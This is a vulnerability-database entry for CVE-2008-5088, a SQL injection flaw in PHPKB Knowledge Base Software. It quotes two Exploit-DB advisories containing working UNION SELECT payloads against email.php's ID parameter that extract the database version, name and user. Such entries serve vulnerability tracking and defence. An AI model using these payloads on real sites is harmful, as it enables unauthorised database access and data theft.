CVE-2008-5088
published 2008-11-14
CVE-2008-5088: Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1.5 Professional allow remote attackers to execute arbitrary SQL commands via the ID…
Priority: P342 | high | 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.98% (57.9th percentile)
Multiple SQL injection vulnerabilities in PHPKB Knowledge Base Software 1.5 Professional allow remote attackers to execute arbitrary SQL commands via the ID parameter to (1) email.php and (2) question.php, a different vector than CVE-2008-1909.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| knowledgebase-script | phpkb_knowledge_base_software | — | — |
No detection rules found.
Exploit-DB
PHPKB Knowledge Base Software 2.0 - Multilanguage Support Multiple SQL Injections
exploitdb·2010-05-10
---
[+] {In The Name Of Allah The Mercifull}
[+]
[~] Tybe: PHPKB Knowledge Base Software v2 Multilanguage Support Multi SQL Injection Vulnerabilities
[~] Vendor: www.knowledgebase-script.com
[+] Software:PHPKB Knowledge Base Software v2 Multilanguage Support
[-]
[+] author: ((R3d-D3v!L))
[~]
[+] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY ---->((4.!.5))
[~]
[?] contact: X[at]hotmail.co.jp
[-]
[?] Date: 3.Jan.2010
[?] T!ME: 04:15 am GMT
[?] Home: © Offensive Security
[?]
[?]
[-]{DEV!L'5 of SYST3M}
# SQL Injection #1 - email.php ID
[*] Err0r C0N50L3:
http://127.0.0.1/email.php?ID={EV!L EXPLO!T}
[*]{EV!L EXPLO!T}
1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*
# SQL Injection #2 - comment.ph
Exploit-DB
PHPKB 1.5 Professional - Multiple SQL Injections
exploitdb·2008-09-21
---
[~] PHPKB Knowledge Base Software v1.5 Professional (email.php) - SQL Injection Vulnerability
[~]
[~] http://www.knowledgebase-script.com
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date: 20.09.2007
[~]
[~]
[~] [email protected]
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~] Pentest|Gibon|Pig
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/email.php?ID=SQL
[~]
[~] Demo :-
[~]
[~]
[~] http://xxxx.com/email.php?ID=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user())+LIMIT 1,1/*
[~]
[~]---------------------------
No writeups or analysis indexed.